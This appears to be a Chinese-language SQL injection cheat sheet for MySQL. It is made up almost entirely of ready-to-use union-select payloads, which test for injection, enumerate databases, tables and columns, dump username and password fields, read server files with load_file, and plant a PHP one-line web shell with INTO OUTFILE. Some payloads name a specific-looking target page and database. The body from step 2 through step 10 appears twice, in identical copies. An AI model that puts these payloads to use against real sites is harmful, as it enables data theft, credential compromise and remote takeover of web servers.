1 判断注入点: and 1=1 (页面正常) 与 and 1=2 (页面异常或为空) 返回结果不同,说明参数被直接带入了查询;两者无差异时再考虑字符型注入(需先闭合引号)或盲注。
2 爆字段数 order by x
3 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16
操作系统信息:
and 1=2 union all select @@global.version_compile_os from mysql.user /* (from mysql.user 要求当前账号能读 mysql 库;没有该权限时可去掉 from 子句直接 select @@version_compile_os;union 的列数仍须与 order by 探出的字段数一致)
数据库权限:
and ord(mid(user(),1,1))=114 /* 返回正常只说明 user() 的首字符是 'r'(ASCII 114),并不能断定就是 root;应递增 mid 的第二个参数逐字符比较,或直接在回显列里输出 user() 确认
4 查用户、版本、库名: user(),version(),database() 如: 在第 2、5、6 列回显
and 1=2 union select 1,user(),3,4,version(),database(),7,8,9,10,11,12,13,14,15,16
或: and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*
判断有几个库:
and 1=2+union+select+1,2,concat(version(),0x3a,database(),0x3a,user()),4,5
english/newsview.php?id=746 and 1=2 union select 0,concat(char(94),char(94),char(94),count(*),char(94),char(94),char(94)),0,0,0,0,0,0,0,0 from (select * from information_schema.tables group by table_schema order by table_schema) t limit 1/* and 1=1 (空格已还原,URL 中可用 + 或 %20 代替;char(94) 即 ^,作定界符便于在页面里定位结果;MySQL 5.7 起默认 sql_mode 含 ONLY_FULL_GROUP_BY,select * ... group by 会报错,可改用 select count(distinct table_schema) from information_schema.tables)
逐条爆库:
english/newsview.php?id=746 and 1=2 union select 0,concat(char(94),char(94),char(94),table_schema,char(94),char(94),char(94)),0,0,0,0,0,0,0,0 from (select * from (select * from information_schema.tables group by table_schema order by table_schema limit 0,1) t order by table_schema desc) t limit 1/* and 1=1 (递增 limit 0,1 的偏移量逐条取库名;同样受 ONLY_FULL_GROUP_BY 影响,可用 select distinct table_schema from information_schema.tables order by table_schema limit 0,1 代替)
5 爆所有数据库: group_concat 把多行合并到一个回显列,结果受 group_concat_max_len(默认 1024 字节)截断,库表多时会被截掉;这里依赖的 information_schema 只在 MySQL 5.0 以上存在
and 1=2 union select 1,group_concat(schema_name) ,3,user(),load_file(char(99,58,92,98,111,111,116,46,105,110,105)),6,7,8,9,10,11 from information_schema.schemata-- (注意:MySQL 的 -- 注释后面必须跟空白,URL 末尾的空格常被去掉,应写成 --+ 或 -- -;load_file 需要 FILE 权限并受 secure_file_priv 限制,不满足时该列只返回 NULL,不影响其它列的回显)
6 爆所有表名:
and 1=2 union select 1,group_concat(table_name) ,3,user(),load_file(char(99,58,92,98,111,111,116,46,105,110,105)),6,7,8,9,10,11 from information_schema.tables where table_schema=database()-- (table_schema=database() 只列当前库的表;-- 后须跟空白,写成 --+ 或 -- -)
7 爆所有列名:
and 1=2 union select 1,group_concat(column_name) ,3,user(),load_file(char(99,58,92,98,111,111,116,46,105,110,105)),6,7,8,9,10,11 from information_schema.columns where table_name=0x636F-- (0x636F 只是占位,替换成目标表名的十六进制;同名表可能存在于多个库,宜再加 and table_schema=database() 限定,否则列名会混在一起;-- 后须跟空白)
8 不用 group_concat、借助 limit 逐条爆库表及列的用法(仍依赖 information_schema,因此同样要求 MySQL 5.0 以上;原文"5.0以下"有误):
爆数据裤:
and 1=2 union select 1,schema_name,3,4,5,6,7,8,9,10 from information_schema.SCHEMATA limit 0,1/*
爆表名:
and 1=2 union select 1,2,3,4,table_name,6,7,8,9,10 from information_schema.tables where TABLE_SCHEMA=0x686273746172735F636D73 limit 0,1/* 0x686273746172735F636D73 即库名 hbstars_cms 的十六进制(用十六进制可避免引号被 magic_quotes 转义);递增 limit 的偏移量逐条取表名
爆列名:
and 1=2 union select 1,COLUMN_NAME,3,4,5,6,7,8,9,10 from information_schema.COLUMNS where TABLE_NAME=0x61666669636865 limit 0,1/* 这里 0x61666669636865 是0x+表名的十六进制
暴库 (mysql>5.0)
MySQL 5.0 以上有内置库 information_schema,存储着所有数据库和表结构信息;但它只显示当前账号拥有权限的对象,低权限账号看到的库、表并不完整
and 1=2 union select 1,2,3,SCHEMA_NAME,5,6,7,8,9,10 from information_schema.SCHEMATA limit 0,1
猜表
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8,9,10 from information_schema.TABLES where TABLE_SCHEMA=数据库(十六进制) limit 0(开始的记录,0为第一个开始记录),1(显示1条记录)--
猜字段
and 1=2 Union select 1,2,3,COLUMN_NAME,5,6,7,8,9,10 from information_schema.COLUMNS where TABLE_NAME=表名(十六进制)limit 0,1
暴密码
and 1=2 Union select 1,2,3,用户名段,5,6,7,密码段,8,9 from 表名 limit 0,1
高级用法(一个可用字段显示两个数据内容):
and 1=2 Union select 1,2,3,concat(用户名段,0x3c,密码段),5,6,7,8,9,10 from 表名 limit 0,1 (原文 3 与 concat 之间缺逗号;concat 只占一个回显列,总列数仍须与 order by 探出的字段数一致;0x3c 即 < 作分隔符,若被浏览器当作 HTML 标签吞掉可换成 0x3a 即 :)
9 读C:\boot.ini文件 当然也可以读目录 /c:\/
譬如读出来的内容如果含有 < > 等符号,浏览器会把它们当作 HTML 标签解析而不是原样显示,你自然什么都看不到。对付这种情况可以直接查看页面源代码,或者用 replace 把 < 换掉:
replace(load_file(A),char(B),char(C))  即把文件 A 内容中所有字符 B 替换为字符 C(原文多了一个右括号)
and 1=2 union select 1,2,3,4,replace(load_file(char(99,58,92,98,111,111,116,46,105,110,105)),char(60),char(32)),6,7,8,9,10,11,12,13,14--
或:and 1=2 union select 1,2,3,4,replace(load_file(0x433A5C626F6F742E696E69),char(60),char(32)),6,7,8,9,10,11,12,13,14--
2: 回显字段的宽度不够、读到的文件不完整时,用 Substring(str,pos,len) 函数解决:从字符串 str 的第 pos 个字符(从 1 开始计)起返回 len 个字符的子串。
譬如 Substring(load_file(A),50,100) 就是把 A 的内容从第 50 个字符开始回显 100 个给你。每次把 pos 加 100 就能逐段读完整个文件。
and 1=2 union select 1,2,3,4,Substring(load_file(char(99,58,92,98,111,111,116,46,105,110,105)),50,100),6,7,8,9,10,11,12,13,14--
10 直接写马(Root权限)
条件:1、知道站点物理路径(可从报错信息、phpinfo 或用 load_file 读配置文件获得)
2、数据库账号有 FILE 权限(and (select count(*) from mysql.user)>0 只能证明可读 mysql 库,不能证明有 FILE 权限;更准确的是查 mysql.user 中当前账号的 File_priv 列)
3、magic_quotes_gpc=OFF,否则引号会被转义;此外较新版本 MySQL 默认设置了 secure_file_priv,会限制甚至禁止 into outfile 的写出目录,且 mysqld 进程本身须对目标目录有写权限
select '<?php eval_r($_POST[cmd])?>' into outfile '物理路径' (引号须用半角 ' 而不是 ‘;eval_r 不是 PHP 函数,是发帖时被过滤改写的形式,使用前需还原;into outfile 不会覆盖已存在的文件,Windows 路径中的反斜杠可用 / 代替或写成 \\)
and 1=2 union all select 1,2,一句话HEX值,4,... into outfile '路径' (列数须与前面的 select 一致;十六进制写法避免了一句话本身的引号,但 outfile 的路径仍需引号,magic_quotes 开启时依然会失败;写出的文件会包含其它列的值和制表符,一般不影响 PHP 解析)
2 爆字段数 order by x
3 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16
操作系统信息:
and 1=2 union all select @@global.version_compile_os from mysql.user /* (from mysql.user 要求当前账号能读 mysql 库;没有该权限时可去掉 from 子句直接 select @@version_compile_os;union 的列数仍须与 order by 探出的字段数一致)
数据库权限:
and ord(mid(user(),1,1))=114 /* 返回正常只说明 user() 的首字符是 'r'(ASCII 114),并不能断定就是 root;应递增 mid 的第二个参数逐字符比较,或直接在回显列里输出 user() 确认
4 查用户、版本、库名: user(),version(),database() 如: 在第 2、5、6 列回显
and 1=2 union select 1,user(),3,4,version(),database(),7,8,9,10,11,12,13,14,15,16
或: and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*
判断有几个库:
and 1=2+union+select+1,2,concat(version(),0x3a,database(),0x3a,user()),4,5
english/newsview.php?id=746 and 1=2 union select 0,concat(char(94),char(94),char(94),count(*),char(94),char(94),char(94)),0,0,0,0,0,0,0,0 from (select * from information_schema.tables group by table_schema order by table_schema) t limit 1/* and 1=1 (空格已还原,URL 中可用 + 或 %20 代替;char(94) 即 ^,作定界符便于在页面里定位结果;MySQL 5.7 起默认 sql_mode 含 ONLY_FULL_GROUP_BY,select * ... group by 会报错,可改用 select count(distinct table_schema) from information_schema.tables)
逐条爆库:
english/newsview.php?id=746 and 1=2 union select 0,concat(char(94),char(94),char(94),table_schema,char(94),char(94),char(94)),0,0,0,0,0,0,0,0 from (select * from (select * from information_schema.tables group by table_schema order by table_schema limit 0,1) t order by table_schema desc) t limit 1/* and 1=1 (递增 limit 0,1 的偏移量逐条取库名;同样受 ONLY_FULL_GROUP_BY 影响,可用 select distinct table_schema from information_schema.tables order by table_schema limit 0,1 代替)
5 爆所有数据库: group_concat 把多行合并到一个回显列,结果受 group_concat_max_len(默认 1024 字节)截断,库表多时会被截掉;这里依赖的 information_schema 只在 MySQL 5.0 以上存在
and 1=2 union select 1,group_concat(schema_name) ,3,user(),load_file(char(99,58,92,98,111,111,116,46,105,110,105)),6,7,8,9,10,11 from information_schema.schemata-- (注意:MySQL 的 -- 注释后面必须跟空白,URL 末尾的空格常被去掉,应写成 --+ 或 -- -;load_file 需要 FILE 权限并受 secure_file_priv 限制,不满足时该列只返回 NULL,不影响其它列的回显)
6 爆所有表名:
and 1=2 union select 1,group_concat(table_name) ,3,user(),load_file(char(99,58,92,98,111,111,116,46,105,110,105)),6,7,8,9,10,11 from information_schema.tables where table_schema=database()-- (table_schema=database() 只列当前库的表;-- 后须跟空白,写成 --+ 或 -- -)
7 爆所有列名:
and 1=2 union select 1,group_concat(column_name) ,3,user(),load_file(char(99,58,92,98,111,111,116,46,105,110,105)),6,7,8,9,10,11 from information_schema.columns where table_name=0x636F-- (0x636F 只是占位,替换成目标表名的十六进制;同名表可能存在于多个库,宜再加 and table_schema=database() 限定,否则列名会混在一起;-- 后须跟空白)
8 不用 group_concat、借助 limit 逐条爆库表及列的用法(仍依赖 information_schema,因此同样要求 MySQL 5.0 以上;原文"5.0以下"有误):
爆数据裤:
and 1=2 union select 1,schema_name,3,4,5,6,7,8,9,10 from information_schema.SCHEMATA limit 0,1/*
爆表名:
and 1=2 union select 1,2,3,4,table_name,6,7,8,9,10 from information_schema.tables where TABLE_SCHEMA=0x686273746172735F636D73 limit 0,1/* 0x686273746172735F636D73 即库名 hbstars_cms 的十六进制(用十六进制可避免引号被 magic_quotes 转义);递增 limit 的偏移量逐条取表名
爆列名:
and 1=2 union select 1,COLUMN_NAME,3,4,5,6,7,8,9,10 from information_schema.COLUMNS where TABLE_NAME=0x61666669636865 limit 0,1/* 这里 0x61666669636865 是0x+表名的十六进制
暴库 (mysql>5.0)
MySQL 5.0 以上有内置库 information_schema,存储着所有数据库和表结构信息;但它只显示当前账号拥有权限的对象,低权限账号看到的库、表并不完整
and 1=2 union select 1,2,3,SCHEMA_NAME,5,6,7,8,9,10 from information_schema.SCHEMATA limit 0,1
猜表
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8,9,10 from information_schema.TABLES where TABLE_SCHEMA=数据库(十六进制) limit 0(开始的记录,0为第一个开始记录),1(显示1条记录)--
猜字段
and 1=2 Union select 1,2,3,COLUMN_NAME,5,6,7,8,9,10 from information_schema.COLUMNS where TABLE_NAME=表名(十六进制)limit 0,1
暴密码
and 1=2 Union select 1,2,3,用户名段,5,6,7,密码段,8,9 from 表名 limit 0,1
高级用法(一个可用字段显示两个数据内容):
and 1=2 Union select 1,2,3,concat(用户名段,0x3c,密码段),5,6,7,8,9,10 from 表名 limit 0,1 (原文 3 与 concat 之间缺逗号;concat 只占一个回显列,总列数仍须与 order by 探出的字段数一致;0x3c 即 < 作分隔符,若被浏览器当作 HTML 标签吞掉可换成 0x3a 即 :)
9 读C:\boot.ini文件 当然也可以读目录 /c:\/
譬如读出来的内容如果含有 < > 等符号,浏览器会把它们当作 HTML 标签解析而不是原样显示,你自然什么都看不到。对付这种情况可以直接查看页面源代码,或者用 replace 把 < 换掉:
replace(load_file(A),char(B),char(C))  即把文件 A 内容中所有字符 B 替换为字符 C(原文多了一个右括号)
and 1=2 union select 1,2,3,4,replace(load_file(char(99,58,92,98,111,111,116,46,105,110,105)),char(60),char(32)),6,7,8,9,10,11,12,13,14--
或:and 1=2 union select 1,2,3,4,replace(load_file(0x433A5C626F6F742E696E69),char(60),char(32)),6,7,8,9,10,11,12,13,14--
2: 回显字段的宽度不够、读到的文件不完整时,用 Substring(str,pos,len) 函数解决:从字符串 str 的第 pos 个字符(从 1 开始计)起返回 len 个字符的子串。
譬如 Substring(load_file(A),50,100) 就是把 A 的内容从第 50 个字符开始回显 100 个给你。每次把 pos 加 100 就能逐段读完整个文件。
and 1=2 union select 1,2,3,4,Substring(load_file(char(99,58,92,98,111,111,116,46,105,110,105)),50,100),6,7,8,9,10,11,12,13,14--
10 直接写马(Root权限)
条件:1、知道站点物理路径(可从报错信息、phpinfo 或用 load_file 读配置文件获得)
2、数据库账号有 FILE 权限(and (select count(*) from mysql.user)>0 只能证明可读 mysql 库,不能证明有 FILE 权限;更准确的是查 mysql.user 中当前账号的 File_priv 列)
3、magic_quotes_gpc=OFF,否则引号会被转义;此外较新版本 MySQL 默认设置了 secure_file_priv,会限制甚至禁止 into outfile 的写出目录,且 mysqld 进程本身须对目标目录有写权限
select '<?php eval_r($_POST[cmd])?>' into outfile '物理路径' (引号须用半角 ' 而不是 ‘;eval_r 不是 PHP 函数,是发帖时被过滤改写的形式,使用前需还原;into outfile 不会覆盖已存在的文件,Windows 路径中的反斜杠可用 / 代替或写成 \\)
and 1=2 union all select 1,2,一句话HEX值,4,... into outfile '路径' (列数须与前面的 select 一致;十六进制写法避免了一句话本身的引号,但 outfile 的路径仍需引号,magic_quotes 开启时依然会失败;写出的文件会包含其它列的值和制表符,一般不影响 PHP 解析)